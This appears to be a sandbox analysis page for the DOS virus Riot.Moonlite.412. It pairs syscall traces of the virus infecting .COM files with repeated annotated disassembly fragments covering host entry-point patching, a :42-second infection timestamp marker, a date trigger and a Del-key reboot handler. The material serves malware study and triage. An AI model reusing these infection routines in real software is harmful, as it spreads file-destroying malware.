Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.412


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:12:58.357573959Z 26 PC: 12ae4 | Set disk transfer address
2018-12-17T23:12:58.359091181Z 78 PC: 12aef | Find first file
2018-12-17T23:12:58.36712373Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.383873362Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:12:58.391618529Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.400018374Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.401525388Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.404081988Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.414187441Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.415696917Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.42316776Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.425422496Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.435331079Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.446379356Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.449397549Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.460735645Z 61 PC: 12b19 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:12:58.468596366Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.475896453Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.478009069Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.480683985Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.484251426Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.486835855Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.48997668Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.492261288Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.503077971Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.514424562Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.517935071Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.529878515Z 61 PC: 12b19 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:12:58.537679349Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.5494038Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.551364175Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.555108891Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.559163582Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.561504443Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.566025853Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.569249085Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.584241129Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.596247899Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.599445035Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.610466967Z 61 PC: 12b19 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:12:58.618762557Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.626050686Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.627737075Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.630627239Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.634082134Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.636603347Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.640812385Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.644119283Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.653285038Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.66428131Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.668498295Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.679544422Z 61 PC: 12b19 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:12:58.687170666Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.695026562Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.696662543Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.699294736Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.703337825Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.706418349Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.709738977Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.712591744Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.720777056Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.727300143Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.729335426Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.737796577Z 61 PC: 12b19 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:12:58.743125951Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.750854686Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.753041556Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.766781144Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.776505903Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.779114568Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.786654651Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.788864552Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.798554698Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.810088922Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.813507551Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.825984156Z 61 PC: 12b19 | Open file (Filename = 'PAH.COM')
2018-12-17T23:12:58.834241832Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.84231267Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.845296414Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.848790658Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.852463371Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.854739706Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.858310034Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.86001916Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.868550533Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.880229249Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.883244473Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.894070375Z 61 PC: 12b19 | Open file (Filename = 'TEST.COM')
2018-12-17T23:12:58.929950972Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.933041305Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.934896485Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.937797937Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.940949227Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.942385743Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.945440114Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.947066126Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.953426829Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.961037665Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.963149873Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
; Sandbox disassembly attached to the "Get date" trace row directly above,
; which carries the first instruction: cmp dl, 1. INT 21h/AH=2Ah returns the
; day of the month in DL, so the branch below tests for the 1st.
; Linear sweep: instructions that follow an unconditional jmp here (nop
; padding, the handler further down) are not on the straight-line path.
;
; Day == 1 continues at 0x12b8a; any other day leaves for 0x12bf0, which is
; outside this listing.
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
; AH=09h prints the '$'-terminated string at DS:DX (DX is set outside this
; listing), then execution continues at 0x12bbd, also outside the listing.
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
; Reads a byte from port 60h (keyboard controller data) and compares it with
; 53h, the Del key make code. nop does not touch flags, so the je below still
; acts on this cmp.
; NOTE(review): this has the shape of an INT 09h keyboard handler; the run on
; this page that prints the string also logs Get/Set interrupt vector 9
; calls, which would be its installation -- confirm.
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
; No match: restore AX and chain through the far pointer stored at cs:[0x29f]
; (presumably the saved previous handler -- confirm).
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
; Match: far jump to FFFF:0000, the x86 reset entry point, i.e. the machine
; restarts when the key is seen.
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
; NOTE(review): 4B00h is the INT 21h "load and execute program" function, so
; this looks like the start of a second handler filtering program launches;
; the listing is cut off here -- confirm against the sample.
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-17T23:12:58.964928874Z 26 PC: 12bfa | Set disk transfer address
2018-12-17T23:12:58.966804474Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-17T23:12:58.969471005Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.288146144Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.289248481Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.294894474Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.310311641Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.314982342Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.318928759Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.319856567Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
